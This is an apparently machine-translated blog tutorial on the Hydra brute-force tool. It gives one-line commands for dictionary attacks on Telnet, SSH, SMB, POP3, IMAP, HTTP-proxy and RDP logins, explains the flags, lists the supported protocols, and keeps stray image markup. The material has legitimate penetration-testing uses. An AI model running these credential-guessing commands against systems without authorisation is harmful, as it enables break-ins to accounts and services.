1 crackedTelnetService login account number and password
use command:hydra 192.168.43.133-l telnet-p p.txt telnet
command explanation: attacked host IP is 192.168.43.133, lowercase- l Specify login account, capital- L can specify the file for account cracking, capital -P Specifies the password dictionary to be cracked, if it is lowercase the -p parameter specifies a specific password. Account cracked out is telnet, password is also telnet. You can also use the -o parameter to specify the result of the break to write to a file.
650) this.width=650; "src=" http://s5.51cto.com/wyfs02/M01/8A/D4/wKioL1g9MtXR2PfHAAEmRg_pkC0545.jpg "title=" 1.jpg " alt= "Wkiol1g9mtxr2pfhaaemrg_pkc0545.jpg"/>
2 crackedSshService login account number and password
use command:hydra 127.0.0.1-l root-p p.txt ssh
command explanation: Hack this machine ssh login account and password, account designated as root, password with dictionary attack.
650) this.width=650; "src=" http://s5.51cto.com/wyfs02/M01/8A/D9/wKiom1g9MwOg1RbxAAEQwaRMsOU189.jpg "title=" 2.jpg " alt= "Wkiom1g9mwog1rbxaaeqwarmsou189.jpg"/>
3 crackedSmbService login account number and password
using the command:Hydra 127.0.0.1-l root-p p.txt SMB
4 crackedPop3Service login account number and password
use command:hydra-l root-p p.txt my.pop3.mail POP3
5 crackedImapService login account number and password
use command:hydra-l root-p p.txt 192.168.1.30 IMAP
6 crackedHttp-proxyService login account number and password
use command:hydra-l root-p p.txt http-proxy://192.168.1.20
7 crackedRdpService login account number and password
use command:hydra-l root-p p.txt 192.168.1.30 RDP
8 Accessories-hydraprotocols that support cracking
Hydra main support to crack the following protocol login account and password:
Supported Services:asterisk Cisco CISCO-ENABLECVS Firebird FTP FTPs http[s]-{head|get} http[s]-{get|post}-form Http-proxyhttp-proxy-urlenum ICQ Imap[s] IRC ldap2[s] ldap3[-{cram|digest}md5][s] mssqlmysql NNTP Oracle-listener Oracle-sid pcanywhere PCNFS pop3[s] postgres rdpredis rexec rlogin rsh s7-300 sip SMB smtp[s] smtp-enum SNMP socks5 ssh SS Hkeyteamspeak Telnet[s] VMAUTHD vnc XMPP
This article is from "Eagle a" blog, please make sure to keep this source http://laoyinga.blog.51cto.com/11487316/1877770
Hydra Brute Force hack tool use